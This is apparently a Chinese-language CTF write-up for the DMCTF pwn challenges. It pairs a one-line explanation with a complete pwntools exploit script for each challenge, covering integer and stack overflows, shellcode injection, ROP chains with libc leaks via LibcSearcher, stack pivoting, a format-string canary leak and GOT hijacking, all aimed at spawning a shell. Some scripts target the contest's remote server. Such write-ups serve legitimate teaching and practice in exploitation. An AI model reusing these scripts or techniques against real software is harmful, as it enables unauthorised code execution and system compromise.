以下题均请注意glibc版本问题

intoverflow

整数溢出绕过,跳转到后门函数

exp:

#!/usr/bin/python
#coding:utf-8
from pwn import*

p=process('./intoverflow')
system_addr = 0x8048645
p.recvuntil("Now,we need a password")
payload = 'a' * 0x15 + 'b' * 4 + p32(system_addr)
payload += 'a' * (261 - len(payload))
p.send(payload)
p.interactive()

stackoverflow

栈溢出跳转至后门函数

exp:

#!/usr/bin/python
#coding:utf-8
from pwn import*

system_addr = 0x4006ba
p = process('./stackoverflow')
#p = remote()
p.recvuntil('Welcome to DMCTF,please input your name!')
payload = 'a' * 0x10 + 'b' * 8 + p64(system_addr)
p.sendline(payload)
p.interactive()

shellcode

程序泄露buf地址,发送shellcode,跳转到shellcode执行

exp:

#!/usr/bin/python
#coding:utf-8

from pwn import*

p =process('./shellcode')
context.log_level = 'DEBUG'
context.arch = 'amd64'


#p.recvline()
ret_addr = int(p.recvline()[0:14],16)
shellcode = asm(shellcraft.amd64.sh())
print hex(ret_addr)

payload = shellcode
payload += 'a' * (0x90+8-len(shellcode))
payload += p64(ret_addr)

p.sendline(payload)
p.interactive()

Admin Panel

利用整数溢出突破输入长度限制进行栈溢出。

exp:

from pwn import *

s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
binary = './admin_panel'
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)

sla('Username: ', 'merc')
payload = flat('a'*(0x19+4), 0x804864b).ljust(260, 'a')
sla('Password: ', payload)

p.interactive()

shutup

利用栈溢出调用 read 读取 shellcode 到 bss 段,最后跳转到 bss 段执行 shellcode。

exp:

from pwn import *

s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './shutup'
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)

pop3 = 0x8048539
s(flat('a'*(0x18+4), elf.plt['read'], pop3, 0, elf.bss(), 0x100, elf.bss()))
s(asm(shellcraft.sh()))

p.interactive()

babystack

简单的rop链构造

exp:

 #coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

if args['REMOTE']:
p = remote('dmctf.vaala.cloud',28182)
else:
p = process("./babystack")


def main():
elf=ELF('./babystack')
pop_rbp_ret=0x0000000000400520
pop_rdi_ret=0x0000000000400663
write_plt=elf.plt['write']
libc_start_main_got=elf.got['__libc_start_main']

p.recvuntil("PWNME,PWNME,PWMME!!!\n")

# gdb.attach(p)
main=0x00000000004005B6
rsi_r15_ret=0x0000000000400661
payload1='a'*0x18+p64(pop_rdi_ret)+p64(1)+p64(rsi_r15_ret)+p64(libc_start_main_got)+p64(0)+p64(write_plt)+p64(main)

p.sendline(payload1)

# p.recv()
#打印出write()函数在got表中的地址
libc_start_main_add=u64(p.recv(6).ljust(8,"\x00"))

print "libc_start_main_add="+hex(libc_start_main_add)
libc=LibcSearcher('__libc_start_main',libc_start_main_add)
libc_base=libc_start_main_add-libc.dump('__libc_start_main')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')
print ("system_addr = "+hex(system_addr))
print ("bin_addr = "+hex(bin_addr))
p.recv()
payload2='a'*0x10+'a'*8+p64(pop_rdi_ret)+p64(bin_addr)+p64(system_addr)
p.sendline(payload2)
p.interactive()

if __name__ == '__main__':
main()

easyStack

简单的栈迁移(libc为2.27)

exp:

#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn', env={'LD_PRELOAD':'./libc.so.6'})
p = remote("dmctf.vaala.cloud", 28382)
elf = ELF('./pwn')

pwn_addr = 0x4006AE
pop_rdi = 0x0000000000400803
pop_rsi_ret = 0x0000000000400801
leave_ret = 0x000000000040071f
one = 0x601160
two = 0x601060

if __name__ == "__main__":
# gdb.attach(p, 'b *0x40071F\n')
payload = p64(two) + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(leave_ret)
p.sendafter('name?', payload)
payload = p64(one) + p64(pop_rdi) + p64(0) + p64(pop_rsi_ret) + p64(one + 8) + p64(0) + p64(elf.plt['read']) + p64(leave_ret)
p.sendafter('something?', payload)
payload = 'a' * 0x10 + p64(one) + '\x1f'
p.sendafter('Bye?', payload)
leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc_base = leak - 0x80aa0
success('PUTS: ' + str(hex(leak)))
success('LIBC: ' + str(hex(libc_base)))
og = [0x4f3d5, 0x4f432, 0x10a41c]
payload = p64(og[2] + libc_base)
p.send(payload)
p.interactive()

flag_shop

配合 work 和 buy 功能将钱数降至 0,这样就能构造出包含 $0; 的字符串,然后用寄存器传参把 $0 给 system 调用即可。

exp:

from pwn import *

s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
binary = './flag_shop'
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)

sla('Exit\n', '5')
ru('have $')
money = int(r(1))
sla('[yes/no]', 'yes')
money += 1

times = money / 2
for i in range(times):
sla('Exit\n', '1')
sla('[yes/no]', 'yes')

msg = 0x602080
pop_rdi = 0x400e03
sla('Exit\n', '1')
payload = flat('a'*(0x50+8), pop_rdi, msg+15, elf.plt['system'])
sla('[yes/no]', payload)

sl('6')

p.interactive()

马大师的绝招

格式化字符串漏洞和栈溢出。

格式化字符串漏洞可以泄露canary和libc地址,栈溢出劫持执行流。

exp:

#coding=utf-8
from pwn import *

context.log_level="debug"

local=0
if local:
p=process("pwn-end")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
p=remote("",0)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

# 列表字符串转int,包含一个输出
def get_int(content):
content=int(content,16)
out=hex(content)
print("content to int end is : ",out)
return content

def get_formate_result(spli="0x",length=12):
info=p.recvuntil("0x",drop="true")
info=info[0:length]
print("leak info (may set a and b to get real info) : ",info)
return info



p.recvuntil("!!!!!!!\n")

#gdb.attach(p,"b *0x00000000004007EE")
p.send("%21$p%15$p")


info=get_formate_result()
info=get_formate_result() #libc
libc.address=get_int(info)-0x20840
info=p.recv(16)

canary=get_int(info)
#content=p.recv(32)
p.recvuntil("flag!!!\n")
payload="a"*0x38+p64(canary)+p64(canary)+p64(0x00000000004008f3)+p64(libc.search("/bin/sh").next())+p64(libc.symbols["system"])
p.sendline(payload)

p.interactive()

接化发

利用任意地址写泄露 libc 并进行 GOT 劫持。

exp:

# encoding: utf-8
from pwn import *

s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
binary = './pwn'
context.binary = binary
elf = ELF(binary,checksec=False)
libc = ELF('./libc-2.23.so', checksec=False)
p = process(binary, env={'LD_PRELOAD': './libc-2.23.so'})

sla(':', '/bin/sh;')

attack = 0x602120
stdin = 0x6020b0
printf = elf.got['printf']

for i in range(attack-stdin):
ru('>\n')
sl('2')

addr = ''
for i in range(6):
ru('>\n')
sl('5')
addr += r(1)
ru('>\n')
sl('1')

addr = uu64(addr)
leak('stdin', addr)
base = addr - libc.sym['_IO_2_1_stdin_']
leak('base', base)
system = p64(base + libc.sym['system'])

for i in range(stdin-printf+6):
ru('>\n')
sl('2')

for i in range(5):
ru('>\n')
sl('6')
s(system[i])
ru('>\n')
sl('1')

ru('>\n')
sl('6')
s(system[5])

sl('7')

p.interactive()